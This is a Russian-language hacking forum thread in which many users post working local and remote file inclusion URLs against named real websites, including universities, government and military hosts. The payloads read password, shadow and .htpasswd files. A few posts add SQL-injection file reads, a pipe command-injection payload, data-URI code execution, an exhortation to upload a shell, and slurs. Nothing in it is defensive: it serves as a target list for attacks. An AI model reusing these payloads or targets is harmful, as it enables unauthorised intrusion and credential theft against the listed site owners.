Просмотр полной версии : PHP Иньекции
http://www.matchmaking.at/safe/index.php?file=./index.php
LFI
Кто то уже постил инклюд на этом сайте, но в другом месте, на который уже нету ссылок на главной :)
http://www.media1ads.com/index.php?page=../../../../etc/passwd
http://www.olarkin.com/main/dev/index.php?page=../../../../../../etc/passwd
http://www.kenyonreview.org/kro_full.php?file=../index.php
Ошибки из-за того что уже в kro_full.php уже обьявленно mysql_select_db() и mysql_query().
http://www.ecpat.net/worldcongressIII/print.php?file=../../../index.php
И опять, ошибка из-за того что уже обьявленна функция.
http://dl-stem.kiev.ua/index.php?id=main&page=../index
http://www.tolkynzabirova.kz/press/index.php?file=../../../../../../../../../../../../../etc/passwd
http://www.astrocentr.ru/index.php?przd=drjd&id=./index
http://www.expert-line.com/static.php?file=../../../../../../../../etc/passwd
http://www.expert-line.com/static.php?file=../../../../../../../../etc/group
http://www.siemens-ha.com.cn/download.php?url=../../../../etc/passwd%00
http://www.blaineywellness.com/index.php?file=../../../../../../../../etc/passwd%00
http://www.truthaboutevolution.net/index.php?page=../../../../etc/passwd
==============================
http://www.plagron.fr/index.php?page=../../../../etc/hosts
http://www.nylho.com/index.php?content_file=../../../etc/passwd
http://www.waterstarsauna.com/support/index.php?include_file=../../../../../../../../../../etc/passwd
http://www.ontherun.ca/articles.php?sort=name&dir=/&file=etc/passwd
http://www.advantica.hr/?file=/usr/local/apache/conf/htpasswd-apache-status
http://www.kegerator.net/index.php?file=/etc/passwd
Проявляю активность! =)
[x60]unu
09.11.2009, 18:51
http://datinginukraine.com/privacy.php?language_id=../../../../../../etc/passwd%00
http://www.simchaonline.com/privacy.php?language_id=../../../../../../etc/passwd%00
http://yungdarius.comli.com/page.php?url=http://google.com
http://www.cis-promotion.com/index.php?file=../../../../../../../../../etc/passwd
http://qgotchi.sourceforge.net/index.php?page=../../../../../../../../etc/passwd%00
http://vsmarts.com/iSupport/index.php?
include_file=../../../../../../../../../../../../../../../../../../../../../etc/passwd
Strilo4ka
10.11.2009, 20:35
http://www.greenbergresearch.com/index.php?ID=-2398+union+select+1,2,3,4,5,6,7,8,9,10,11,12,0x2f2 e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f7 06173737764,14--+
данные фильтруються потому и HEX вид.
Можно инклудить, здесь /../../../../../../etc/passwd
переводить, например, через http://www.yellowpipe.com/yis/tools/encrypter/index.php
mailbrush
10.11.2009, 20:38
данные фильтруються потому и HEX вид.
Можно инклудить, здесь /../../../../../../etc/passwd
переводить, например, через http://www.yellowpipe.com/yis/tools/encrypter/index.php
1. Это не PHP, а SQL - инъекция.
2. Это чтение файла через SQL-Инъекцию, а не инклюд.
3. Данные не фильтруются, а слешируются.
[underwater]
10.11.2009, 20:56
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/passwd
http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/passwd
http://www.tonie.net/index.php?p=../../../../../../../etc/passwd
http://www.colombopage.com/cgi-bin/show_ach.cgi?../../../../../../../../../../../etc/passwd
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../etc/passwd
http://www.moderntalking.pl/arts/index.php?strona=/etc/passwd
Форум есть... ток phpbb аватарки не проинклудить :(
http://www.klm-mra.be/klm-new/engels/main01.php?id=menu_links/../../../../../../../../../../../../../../../../../etc/passwd%00
http://www.iusspavia.it/news.php?id=451&menu=../../../etc/passwd
http://www.exclusivalimpeza.com.br/index.php?incl=../../../../../../../../etc/passwd%00&idmenu=219
http://www.exclusivalimpeza.com.br/index.php?incl=../../../../../../../../proc/self/fd/2%00&idmenu=219
http://www.impan.pl/%7Eecmtb11/index.php?file=../../../../etc/passwd
http://www.inmadia.com.br/index.php?lURL=/etc/hosts
open_basedir restriction in effect
Pashkela
18.11.2009, 03:59
http://www.smb.spk-berlin.de/ifm/index.php?ls=10&topic=Home&lang=../../../../../../../../../../../../../../etc/passwd%00&te=ja&tf=ja
http://izhpost.ru/index.php?PAGE=../../../../etc/passwd
BlackSun
28.11.2009, 06:56
f32.aaa.livedoor.jp/~azusa/exp.php?f=http://google.com/t&ttl=%24GLOBALS
http://iaald.org/cee/index.php?page=index.php
jokester Покажи переход на дирректорию выше
ну если я тебя правильно понял...
http://iaald.org/cee/index.php?page=/httpd/html/iaaldorg/www/cee/index.php
HAXTA4OK
30.11.2009, 00:26
http://www.mercadaodascestas.com/index.php?page=/etc/passwd
BlackSun
30.11.2009, 09:09
http://www.opensc.ws/vbseo.php?vbseoembedd=1&vbseourl=customavatars//avatar7916_2.gif
http://library.fotostrana.ru/?page=../../../../../../../../../../etc/passwd%00
nemaniak
29.12.2009, 19:16
http://www.diesiebdruckwerkstatt.at/shop/scripts/text.php3?id=5b91d08a713f80cdd3b2283455384584&lan=de&inc=/etc/passwd
http://www.salondelnorte.de/shop/scripts/text.php3?id=7df5596cf29a029bad99ca2deefb6b5d&lan=de&inc=[url]&no_cache=556763e5e707dd70664cbf27be88ca68
http://www.egold-service.com/scripts/text.php3?id=401fa7a9c6f1a5fe52b1842582f7f8ed&lan=de&inc=[url]&no_cache=0c807a554583782d7ea885e1ba194049
http://www.infragard.net/press/page.php?page=../../../../../../../../../../etc/passwd&mn=4&sm=4-1
HAXTA4OK
09.01.2010, 11:09
http://princeofpersia.org/index.php?open=/etc/passwd
http://www.spannend.nl/index.php?open=/etc/passwd
http://www.girls4man.nl/index.php?open=/etc/passwd
HAXTA4OK
11.01.2010, 12:34
http://www.interspeech2007.org/submissions/index.php?f=/etc/passwd
http://caladenia.net/caladenia/index.php?F=/etc/passwd&Fimg=041
Root-access
11.01.2010, 18:18
LFI:
http://www.newmediamedicine.com/forum/vbseo.php?vbseourl=customavatars/avatar22795_1.gif&vbseoembedd=1
http://www.organiclinker.com/forums/vbseo.php?vbseoembedd=1&vbseourl=avatars/mike.gif
http://www.techsupportforum.com/vbseo.php?vbseoembedd=1&vbseourl=customavatars/avatar64784_3.gif
http://www.wargamez.com.ar/foro/vbseo.php?vbseoembedd=1&vbseourl=avatars/zombipatagonico.gif
CE:
http://www.pokerimestari.com/vbseo.php?vbseoembedd=1&vbseourl=data:,%3C?phpinfo();?%3E
Весёлое и никудышное исполнение кода:
http://cubopanel.com/?modulo=phpinfo
Нераскрученные инклуды на том же серваке (идёт экранирование, поэтому надо слешировать, но прав все равно не хватает выше подняться):
http://asamsl.com/pages.php?p='
http://challisindoorsoccer.com/pages.php?p='
http://fvcsl.com/pages.php?p='
http://www.meche-rebelle.fr/index.php?page=../../../../../etc/passwd%00
Alf0x0ns
15.01.2010, 20:52
Читалка:
www.wjbdradio.com/index.php?f=../../../../../../../etc/passwd%00
www.touchwoodkitchen.co.uk/index.php?f=../../../../../../../etc/passwd
www.bsproducts.co.uk/index.php?f=../../../../../../../etc/passwd
www.myegypt.co.uk/index.php?f=../../../../../../../etc/passwd
www.benalycards.com/index.php?f=../../../../../../../etc/passwd
www.guitaremporium.co.uk/index.php?f=../../../../../../../etc/passwd
www.enercostore.com/index.php?f=../../../../../../../etc/passwd
www.caroldadams.com/index.php?f=../../../../../../../etc/passwd
http://teos.ficp.ac.ru/rusbank/index.php?text=../../../../../../../../../../etc/passwd%00
http://www.aj-e.de/index.php?page=../../etc/passwd
and
http://www.dba-uvh.nl/index.php?id=news&page=../../../etc/passwd
and
http://nonsociety.org/new/index.php?page=../../../../etc/passwd
http://derland.ru/index.php?read=../../../../../../../../../../etc/passwd
PayPal Clone
Сайт МГУ:
http://msu.mnc.ru/view.php?dir=/etc/passwd%00
http://msu.mnc.ru/view.php?dir=/proc/self/status%00
http://msu.mnc.ru/view.php?dir=/proc/self/fd/11%00
HAXTA4OK
29.01.2010, 12:10
http://www.shamrockboats.com/content.php?p=../../../../../etc/passwd
http://homepage.danny-bell.de/index.php?p=/etc/passwd
Root-access
30.01.2010, 19:29
Оф. сайт GuppY CMS:
http://freeguppy.org/thread.php?lng=fr&pg=213632&fid=1&cat=200&c=cGhwaW5mbygpOw==
(В название топика внедрён php-код)
HAXTA4OK
31.01.2010, 00:03
http://utbookstore.tennessee.edu/uccs/index.php?p=../../../../etc/passwd%00
http://www.cheritononline.co.uk/page.php?xPage=../../../../../../../../../../../../../etc/passwd
http://www.daniel.mitchell.name/cameras/index.php?page=../../../../../../../../../../etc/passwd%00
http://www.daniel.mitchell.name/cameras/index.php?page=../../../../../../../../../../proc/self/fd/2%00
bersegos
09.02.2010, 23:04
http://photo.mnc.ru/?path=/../../../../../../../../etc/passwd%00
http://www.madlassgrin.co.uk/index.php?page=../../../../../etc/passwd
http://www.kceducation.org.uk/index.php?page=../../../../../../../etc/passwd
Pashkela
11.02.2010, 07:04
http://fortminor.ru/index.php?page=../../../../../../../../../../../../../../etc/passwd%00&id=main
http://lprussia.com/index.php?page=../../../../../../../../../../../../../../etc/passwd%00&id=music&this_id=text
http://www.sharovnya.com/index.php?page=../../../../../../../../../../../../../../etc/passwd%00
http://news.wgu.edu/news.php?include=../../../../../../../../../../etc/passwd%00
http://tom-grad.ru/index.php?page=/etc/passwd
http://www.warcraft-gold.ru/index.php?page=index.php
http://belfilarmony.ru/index.php?page=/etc/passwd
http://www.ucam.ac.ma/ciro10/pagesa/index.php?page=Reservation&pageinf=../../../../../proc/self/status
Red_EYEs
21.02.2010, 01:46
http://163.13.119.23/page.php?file=C:\boot.ini
Red_EYEs
21.02.2010, 01:53
http://www.boyworld.net/page.php?file=http://google.ru%00 заливай народ шел этим пидарюгам
Залика файлов
http://www.nbns.ru/bin/view.php?dir=trash/
http://www.glovesinabottle.com/news.php?include=../../../../../../../../../../etc/passwd%00
http://news.joelmorris.com/news.php?include=../../../../../../../../../../etc/passwd%00
http://www.skincarenet.org/news.php?include=../../../../../etc/passwd%00
http://www.vdrev.ru/page.php?p=/etc/passwd
http://www.vdrev.ru/page.php?p=page.php
http://www.e-quilibres.net/pages/page.php?rub=gen&p=page.php
http://www.e-quilibres.net/pages/page.php?rub=gen&p=page.php
*************************** !USArmy! ***********************
https://qmo.amedd.army.mil/ptsafety/anticoagulants/anticoags.php?dir=c://
П.П.С. НЕ НЕСУ ОТВЕСТВЕННОСТИ: НИ ЗАКОКОЕ ДЕЙСТВИЕ И НЕ ЗАКОГО!!!
http://sphirewall.net/index.php?page=../../../../../../../../../../../etc/passwd
http://safe-mailbox.com/mwm/index.php?ACTION=../../../../../../../../../../etc/passwd
http://www.x2studios.com/index.php?page=../../../../etc/passwd%00
.:[melkiy]:.
10.03.2010, 09:52
http://www.kino.lg.ua/index.php?page=../../../../etc/passwd
http://home.divetrade.ru/magazin/index.php?page=/etc/passwd
Red_EYEs
10.03.2010, 21:41
http://tonextstep.com/index.php?page=/home/mkfzvto123/.cshrc
вобщем, написал простой многопоточный сканер php инклюдов(только чек на глобальный инклюд), просто ради интереса чекнул 30к ссылей. сканер быстрый (на все ушло где-то 15 мин) вот результат:
http://www.jgrossco.com/index.php?page=[url]
http://www.phyllischubb.com/index.php?page=[url]
http://www.fanglewurzle.com/index.php?page=[url]
http://www.ladieswhotravel.co.uk/index.php?page=[url]
http://www.traceymcnee.com/index.php?page=[url]
http://www.otmd-kongre.com/content.php?p=[url]
http://www.melanieluckes.com/index.php?file=[url]
http://www.jtmusicinc.com/index.php?page=[url]
http://www.fortworthmarketinfo.com/index.php?file=[url]
http://www.terreinmotosrl.com/index.php?open=[url]
http://www.snuginsnow.com/index.php?p=[url]
http://www.chinaprintingtoday.com/index.php?f=[url]
http://www.anihotel.com/index.php?p=[url] - PR5
http://motel-chayka.ru/index.php?p=[url]
http://www.mycigar-online.com/index.php?page=[url]
если кто то хочет помочь, подсказать как его дальше развивать - отпишитесь в личку. быстро реализую...
Red_EYEs
15.03.2010, 01:38
http://www.niteclubs.de/index.php?open=[url]
http://www.pulplivemusik.de/index2.php?open=.htaccess
http://www.ochsenfest.de/index.php?open=index
Red_EYEs
18.03.2010, 04:32
http://oslo.bikini-web.com/freetourNuevo.php?page=../../public_html/password/.htpasswd
http://demo.joomlart.com/extensions15/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00
http://www.bashtest.ru/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00
http://www.france-etuves.com/FR/index.php?p=../../../../etc/passwd
http://www.paseed.gr/index2.php?load=../../../../../etc/passwd
daniel_1024
21.03.2010, 14:50
от меня:
http://lpsc.in2p3.fr/atlas/morel/index.php?p=/etc/passwd
http://www.weeblackskelf.co.uk/label/main.php?x=artists&y=/../../../../../etc/passwd
http://www.mineralogicalassociation.ca/index.php?p=26&page=/../../../../../../../etc/passwd
http://www.bankoo.es/index.php?action=/etc/passwd%00
http://www.sport-surfaces.co.uk/index.php?page=C:\boot.ini%00
http://www.stack.bham.ac.uk/stack/documentation.php?action=/../../../../../../../etc/passwd%00
daniel_1024
24.03.2010, 15:37
Local file inclusion:
http://www.sb-abramowski.gpsur.de/index.php?langid=/../../../../../../../etc/passwd%00
http://www.csritalia.com/template.php?pagina=prse*ccc*prod_sel&id_nuova_lingua=/../../../../../../etc/passwd%00
http://www.quemundo.com/index.php?pagina=/../../../../../../../../../../../../etc/passwd
http://www.mrautomacao.info/index.php?pagina=/../../../../../../../../etc/passwd
http://www.paxtoncat.com.au/index.php?page=../index
http://www.ingfoundation.com.au/main.php?page=lfi
http://www.yappmobile.com.au/index.php?page=../../LFI
http://soulsearchers.spheresoflight.com.au/index.php?page=LFI
http://www.limelight.org.au/index.php?page=archive&sub_page=../index.php
http://kmsmith.com.au/index.php?page=LFI
http://www.ware-house.co.jp/index.php?page=../../../../../../../../../../../../../../etc/passwd%00
http://www.multi.com.br/?pg=../../../../../../../../../../etc/passwd%00
http://www.partnersinpreservation.com/boston/index.php?sec=../../../../../../../../../../../../../etc/passwd%00&locID=16
http://www.sports-emotions.ch/index.php?cat=../../../../../../etc/passwd%00&lang=ge
http://www.ombudsman.mos.ru/index.php?page=contaAct'+union+select+1,2,3,4,5,6, 7,8,9,10,0x4c464900+from+information_schema.tables/*
daniel_1024
31.03.2010, 23:02
http://www.bkmlojistik.com.tr/eindex.php?Path=/etc/passwd
http://evan.hotani.net/poll/index.php?link=/etc/passwd%00
http://www.spangenkoenig.ch/index.php?link=/../../../../etc/passwd%00
http://apu.com.ua/content.php?c=/../../../../../../../../../../etc/passwd&lang=ukr&news=links
http://www.auto-gyro.com.ua/index.php?lang=/../../../../../../etc/passwd%00
http://www.hotelesaustralis.com.ar/destinos.php?lang=/../../../../etc/passwd%00
http://www.sciencesmath-paris.fr/temoignages.php?lang=/../../../../../../etc/passwd%00
http://www.davinomixer.it/index.php?lang=/../../../../../etc/passwd%00
http://www.wyr.com.ua/index.php?lang=/../../../../../../../etc/passwd%00
http://zunn.it/index.php?lang=/etc/passwd%00
http://www.watchme.in/serve/?goto=/etc/passwd&lang=english&show=15&pageno=2
http://www.gayovich.com.ua/index2.php?link=/etc/passwd%00
http://blog.hotani.net/articles/index.php?link=/etc/passwd%00
http://www.tabu.band.pl/index.php?link=/etc/passwd
http://ctconstructii.ro/site/old_04/index.php?lang=/etc/passwd%00
http://juedisches-museum.ch/content.php?lang=/../../../../../etc/passwd%00
http://www.bonnemaman.ch/index2.php?lang=/etc/passwd%00
http://juedisches-museum.ch/content.php?lang=/../../../../../etc/passwd%00&t=2
http://www.snowkiting.ch/index.php?lang=de&site=/etc/passwd%00
http://juedisches-museum.ch/content.php?/../../../../../etc/passwd%00=2&t=4
http://mkc-vertspapiri.lv/main.php?lang=/../../../../../etc/passwd%00&ld=txt&vol=8
http://tom-grad.tomsk.ru/index.php?page=/etc/passwd
http://www.ims.spb.ru/index.php?page=/../../../../etc/passwd
http://department.fzu.cz/ofm/sma//index.php?file=/etc/passwd
local include
http://www.instm.it/test_new_version/index.php?targetpage=../../../../../../../etc/passwd
server- Apache/2.2.8 (Ubuntu) :D
http://www.krog.dp.ukrtelecom.ua/information/services/customers/index.php?page=adsf
http://www.madhatt3r.com/files.php?action=open&¶meter1=../../../../../../../../../etc/passwd
;)
AOL
может новый способ замены нульбайта прокатит..
http://scqa-d03.stream.aol.com/support/docs/index.phtml?language=/etc/passwd&layout=print&prevlayout=normal
http://www.nni.ie/v2/broad/portal.php?content=../../../../../../../etc/passwd
http://www.unic.org.ar/index.php?content=../../../../../../../etc/passwd
http://www.tpfnetwork.org/home.php?contenido=../../../../../../../etc/passwd
shadow открыт на чтение:)
http://www.quemundo.com/index.php?pagina=../../../../../../../../../../../../../../../etc/shadow
http://jamesdeangallery.com/Store/shop.php?load=../../../../../../../etc/passwd
http://hege-online.com/shop/scripts/text.php3?id=fxbzcdjrnwrwqk&lan=&inc=../../../../../../../../etc/passwd
http://www.wf-online.ru:80/includes/js_get.php?js=../../../../../../../../etc/passwd
life_glider
22.04.2010, 02:23
Эти люди создают сайты:
http://www.kreazone.ru/sitedetails.php?SITEID=alttech.gardi&IMAGEID=../../../../../../../usr/home/kreazone/.cshrc//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
PS оффтопик здесь энциклопедия уязвимых сайтов:http://www.kreazone.ru/sites.php
http://www.futurestudies.az/oxu.php?xeber=../../../../../../../etc/passwd
инклудим картинку :)
http://www.ikisahil.com/content/index.php?link=../../../../../../../var/www/ikisahil/public_html/news_images/news_5828_1.jpg
http://www.jeffersmusic.ie/organs/index.php?page=/etc/passwd
Pashkela
25.04.2010, 03:44
http://www.thompsonhistory.co.uk/cgi-bin/page.pl?page=|ls%20-la|
Agel Nash
25.04.2010, 09:33
http://baskov.ru/go/dwn.php?fn=../index.php
http://ysa.rxpinoy.com/index.php?page=../../../../../../../../../etc/passwd
HellFire
25.04.2010, 23:37
http://www.summerschoolalpbach.at/index.php?file=/etc/passwd
http://www.mcxapc.org/static.php?file=../../../../../../../etc/passwd
http://www.alexandrejoseph.com/projects/dsgp/?file=../../../../../../../../../etc/passwd
http://www.realestate.bnpparibas.fr/pages/download.php?file=/etc/passwd
http://www.csi.ensmp.fr/WebCSI/4S/prizes/download_prizes.php?file=../../../../../../../../../etc/passwd
http://www.ukskeptics.com/explanation.php?dir=articles/explanations&article=../../../../../../etc/passwd
http://www.stayireland.ie/file.php?file=../../../../../../../../../../etc/passwd
http://www.melosi.it/script/source.php?FILE=../../../../../../../../../../etc/passwd
http://www.breastmilan.com/2008/download.php?file=../../../../../../../../../../etc/passwd
http://www.elesis.gr/php/download.php?file=../../../../../../../../../etc/passwd
http://www.kfar-masaryk.org.il/history/eindex.php?file=../../../../../../../../../etc/passwd
http://www.newgeneration.lv/rus/dla_pressi/interv_u_pastora/in_site/in_site/tools/transfer.php?file=../../../../../../etc/shadow
http://www.admatec.ch/download.php?file=../../../../../../../../etc/passwd
http://www.danubia.hu/file_letoltes.php?file=../../../../../../../../../../../etc/passwd
http://www.redfred.hu/page/file.php?file=../../../../../../../../../../../etc/passwd
http://www.iws.ie/stg/public/download.php?site=site1515&file=../../../../../../../etc/passwd
http://www.acceleratingperformance.ie/download.php?file=../../../../../../../../etc/passwd
http://www.arkskincare.com/download.php?file=../../../../../../../../../etc/passwd
http://www.ryansautomotive.ie/file.php?file=../../../../../../../../../etc/passwd
http://www.irishlungfoundation.ie/includes/dw.php?file=../../../../../../../etc/passwd
http://www.consultativecouncilonhepc.ie/downloads.php?file=../../../../../../../etc/passwd
http://www.leakdetection.ie/stg/public/download.php?site=site1418&file=../../../../../../../etc/passwd
http://www.joeotoole.net/stg/public/download.php?site=site1049&file=../../../../../../../../../etc/passwd
http://www.kjellberg.sk/files/download_file.php?file=../../../../../../../../etc/passwd
http://www.bressner.co.uk/downloadpdf.php?file=../../../../../../etc/passwd
http://journals.cambridge.org/downloadfile.php?file=../../../../../../../../etc/passwd
http://www.exantia.co.uk/download.php?file=../../../../../../../../etc/passwd
http://www.omegawatches.com/download.php?file=../../../../../../../etc/passwd
http://www.drps.org/forcedownload.php?file=../../../../../../../etc/passwd
http://ncesubsea.no/download.php?file=../../../../../../../etc/passwd
http://www.elesis.gr/php/download.php?file=../../../../../../../../etc/passwd
http://bibus.com.ua/download.php?file=../../../../../../../../../etc/passwd
http://www.teachingclimatechange.com.au/file.php?file=../../../../../../../../etc/passwd
http://www.oceanblueherveybay.com.au/assets/download.php?file=../../../../../../../../etc/passwd
http://olympia-business.com/html/Download/index.php?file=../../../../../../../../etc/passwd
http://www.refrachem-bg.com/site/show.php?file=../../../../../../../etc/passwd
http://www.adis.bg/save_file.php?file=../../../../../../../../etc/passwd
http://www.adept-bg.com/gallery/register.php?file=../../../../../../../../etc/passwd
http://basesestates.com/index.php?file=../../../../../../../../etc/passwd
http://www.park-vitosha.org/main.php?act=html&file=../../../../../../../../etc/passwd
http://www.indexaward.dk/download.php?file=../.././../../../../../etc/passwd
http://www.st-feuillien.com/download.php?file=../../../../../../../../etc/passwd
http://www.orpheusinstituut.be/downloadfile.php?file=../../../../../../../../etc/passwd
http://escher.elis.ugent.be/publ/Edocs/doc.php?file=../../../../../../../../etc/passwd
http://www.faro-dental.de/download.php?file=../../../../../../../../etc/passwd
http://www.microstep.be/download.php?file=../../../../../../../../etc/passwd
http://www.templatekit.com/tstore/wrapper.php?file=../../../../../../../../etc/passwd
http://www.evel1.com/Shop/wrapper.php?file=../../../../../../../../etc/passwd
http://www.salda.lt/download2.php?fname=Technical%20data.pdf&file=../../../../../../../../etc/passwd
http://pgt.visaginas.com/get_file.php?file=../../../../../../../../etc/passwd
http://sps.com.cn/downpdf.php?file_path=../../../../../../etc/passwd
http://www.fcmscsp.edu.br/posgraduacao/cursos/down.php?file=../../../../../../../../../etc/passwd
http://www.cnpdia.embrapa.br/rbfv/pdfs/download.php?file=../../../../../../../../../etc/passwd
http://www.caa-telco.com/index.php?page=../../../../../../../../../../etc/passwd
http://www.sungrowpower.com/downpdf.php?file_path=../../../../../../etc/passwd
http://download.tvkdiana.pl/explorer/explorer.php?file=../../../../../../etc/passwd
http://www.ziggi.pl/pdf_download.php?file=../../../../../../../etc/passwd
http://www.mercator-e.pl/en/lib/tmp.php?file=../../../../../../../etc/passwd
http://www.embwise.com/common/download.php?file=../../../.././../../../../etc/passwd
http://www.indianspices.com/php/downloadfile.php?file=../../../../../../../../../../etc/passwd
http://www.novarsa.com/force_download.php?file=../../../../../../../../etc/passwd
http://www.acehrecoveryforum.org/library/download.php?file=../../../../../../etc/passwd
http://www.ahgwa.com.au/includes/download_file.php?file=../../../../../etc/passwd
http://www.dexterton.com/download.php?file=../../../../../../../etc/passwd
60+3
http://www.dprogram.cz/PROKES/publ/load.php?f=/data/www/virtuals/dprogram_cz/html/PROKES/publ/load.php
http://www.djo.harvard.edu/print.php?url=http://site.com/shl
едаааададада
http://www.voicefinder.net/addpac_kor2/down.php?file=../../../../../../../etc/passwd
http://www.alexandrejoseph.com/projects/dsgp/?file=../../../../../../etc/passwd
http://www.ove-national.education.fr/index.php?lang=fr&page=../../../../../../../etc/passwd
http://www.training-sscsworld.com/softwares/paypal/index.php?read=../../../../../../../../../../proc/self/environ
http://www.worldwidepay.com/index.php?read=../../../../../../../../../../var/cpanel/cpanel.config
http://www.spfldcycling.org/schedule.php?incl=../../../../../../../../../../../../etc/passwd
Financier
06.05.2010, 13:06
http://www.racketlon.co.uk/news.php?id=/etc/passwd
BrainDeaD
09.05.2010, 22:46
http://www.erh.noaa.gov/okx/readtext.php?file=../../../etc/passwdPR 7
www.berlin.de/verwaltungsakademie/programm/gesamt_mj.php?year=../../../../../../etc/passwd%00
www.berlin.de/special/reisen/leserreisen/global/src/web/index_ssl.php?Path=/../../../../../../etc/passwd
BrainDeaD
11.05.2010, 00:46
любителям симпсонов))
http://www.springfieldohio.net/news/results.php?file=../../../../etc/passwd
PR 4
http://www.futbol.co.cr/main.php?action=&catid=46&template=../../../../../../../etc/passwd
wildshaman
11.05.2010, 23:00
http://abit.ifmo.ru/?page=../../../../../index.php%00
http://www.x5musicgroup.com/prelisten/playlist.php?file=../../../../../../../../../etc/passwd
;)
BrainDeaD
12.05.2010, 01:19
сегодня в ассортименте Бразилия
http://www.premiosindusfarmaqualidade.org.br/voto/index.php?include=../../../../../etc/passwd
http://www.prevcaixa.com.br/index.php?include=../../../etc/passwd
http://www.cursomaisroo.com.br/new.php?include=../../../etc/passwd
http://www.consultebh.com.br/index.php?include=../../../etc/passwd
http://webparadise.soft-in.ru/index.php?namepage=[url]
расширение инклудироваемого файла должно быть .php, нуллбайтом никак не обрежешь
пример: http://webparadise.soft-in.ru/index.php?namepage=http://forum.antichat.ru/index
BrainDeaD
13.05.2010, 14:23
http://webparadise.soft-in.ru/index.php?namepage=[url]
расширение инклудироваемого файла должно быть .php, нуллбайтом никак не обрежешь
ОСТОРОЖНО! туда уже трояна залили!
дабы не только оффтопить, вот от меня:
http://www.mathxpert.com/about.php?include=../../../../etc/passwd
PR5
http://www.metamatiamou.gr/index.php?page=[url]
расширение инклудируемого файла должно быть .html
BrainDeaD
15.05.2010, 04:01
http://www.wiknet.us/services/technicalsupport.php?include=../../.htpasswd-admins
http://www.tax.vsem.com.ua/index.php?page=[local file];&idnn=2958
[ windows ]
http://extension.entm.purdue.edu/eseries3/view.php?article=view.php
http://www.mcli.dist.maricopa.edu/learnshops/active/outline.php?id=abcd/../../index.php
http://www.clownorama.com/index2.php?load=../../../../../etc/passwd
http://www.pressepapiers.fr/download.php?file=../../../../../../../../etc/passwd
PR-5
http://www.brucehonda.com/page.php?page=[url]
расширение инклюдируемого файла: любое, нулл байт не нужен
пример:
http://www.brucehonda.com/page.php?page=http://forum.antichat.ru/index.php
шелл ваш)
http://www.nlcindia.co.in/index.php?file_name=../../../../etc/passwd
http://www.jrodrigues.com/index.php?file=../../../../etc/passwd&shownew=72
http://amrel.obspm.fr/bommier/index.php?page=../../../../../../../../../etc/passwd
http://www.dstewartedu.co.uk/pr-display.php?page=../../../../../../../etc/passwd
http://svaltera.zp.ua/index.php?inc=../../../../../../../../etc/passwd
http://www.iaald.org/index.php?page=../../../../../../../../httpd/html/iaaldorg/www/index.php
http://www.headspingames.com/index.php?page=../../../../../../../etc/passwd
http://www.philippinebeekeeping.com/index2.php?page=../../../../../../etc/passwd
http://www.weetwatikeet.nl/index.php?page=../../../../../../etc/passwd
http://www.inspiration4you.eu/en/print.php?page=../../../../../../etc/passwd
-----------------------------------------------------
http://www.helsinkirugby.org/index.php?page=news&story=../../../../../../../../etc/passwd
xaxaxa server chroot-или
http://www.helsinkirugby.org/index.php?page=news&story=../../../../../../../../var/chroot/home/content/97/5735397/html/clubhouse/index.php
а вот и вам phpinfo :)
http://www.helsinkirugby.org/phpinfo.php
можно и так
http://www.helsinkirugby.org/index.php?page=news&story=../../../../../../../../var/chroot/home/content/97/5735397/html/phpinfo.php
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../etc/passwd
BrainDeaD
20.05.2010, 22:48
http://www.sportenspelweek.nl/index.php?include=H:\Croot\sesw\index
расширение .php
нульбайт работает, но . заменяется на *
http://www.iftomm.ho.ua/index.php?../../../../../../etc/passwd
http://www.atlllc.com/atlantis.php?page=/etc/passwd%00
http://www.mobileshop-online.com/index.php?page=../../../../../../etc/passwd
http://www.ougerman.com/Calendars/index.php?page=../../../../../../etc/passwd
http://cyclecontrol.com/index.php?page=/hermes/bosweb/web040/b406/sl.ianyoung/public_html/index
http://www.musee-airborne.com/eng/page.php?page=../../../../../../var/www/html/sites/webcommedia14/musee-airborne.com/html/eng/page
http://www.statusecclesiae.net/status/common.php?pagina=../../../../../../../../etc/passwd
http://foto.denhaag.org/PHP/pagina.php?link=../../../../../../../../etc/passwd
http://davidhildebrand.org/index.php?page=../../../../../../etc/passwd
http://www.cedarfallstrinity.org/index.php?page=../../../../../etc/passwd
http://www.sambo-asia.org/en/index.php?page=https://forum.antichat.ru
BrainDeaD
22.05.2010, 02:26
http://www.pwshrunninwolves.org/active/2006CC/shell.php?include=[url]
весит 3.7mb
http://www.efah.org/pdfcount.php?fln=../../../../../../etc/passwd
Virologist
23.05.2010, 17:14
;)
http://www.1soveti.ru/page.php?link=../../../../../proc/self/status%00
http://www.tamadainfo.ru/page.php?open=../../../../../proc/self/status%00
http://www.comundus.net/main.php?cat=3&file=../../../../../../../../home/www/web120/html/members/.htpasswd
PR-7
http://www.ruffneckattack.com/shop.php?shop=../../../../../../../../../etc/passwd
DOS через инклуд:
http://www.m-max.ru/page.php?open=../page.php%00
http://www.jtlighting.com/index.php?show_file=/home/jtlight/public_html/index.php
BrainDeaD
26.05.2010, 01:42
http://www.fmos.ru/firm.php?id=index.php
Интересный инклюд:
http://skdover.ru/main.php?id=[url]&page=[inc. file name]
пример:
http://skdover.ru/main.php?id=http://profismart.ru&page=index
расширение инклюдируемого файла *.Php
http://www.mebel-online.ru/index.htm?File=../../../../../../../../../../etc/passwd
LFI
